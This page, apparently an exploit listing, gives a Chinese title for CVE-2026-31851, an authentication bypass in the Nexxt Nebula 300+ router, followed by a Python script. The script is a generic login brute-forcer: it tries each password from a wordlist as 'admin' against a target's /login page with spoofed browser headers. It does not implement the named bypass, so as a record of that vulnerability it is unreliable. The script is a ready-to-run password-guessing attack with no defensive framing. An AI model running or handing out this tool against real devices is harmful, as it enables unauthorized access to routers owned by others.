CVE-2026-31851 Nexxt Nebula 300+认证绕过漏洞

import requests # Target configuration target_url = "http://<target_ip>/login" username = "admin" wordlist = "passwords.txt" # Headers to mimic a browser headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } def brute_force_login(): # Open the wordlist file with open(wordlist, 'r') as f: for password in f: password = password.strip() # Payload data payload = { "username": username, "password": password } try: # Send POST request to login endpoint response = requests.post(target_url, data=payload, headers=headers, timeout=5) # Check if login was successful (adjust condition based on response) if response.status_code == 200 and "dashboard" in response.text: print(f"[+] Success! Password found: {password}") return password else: print(f"[-] Failed attempt: {password}") except requests.RequestException as e: print(f"[!] Error connecting to target: {e}") break if __name__ == "__main__": brute_force_login()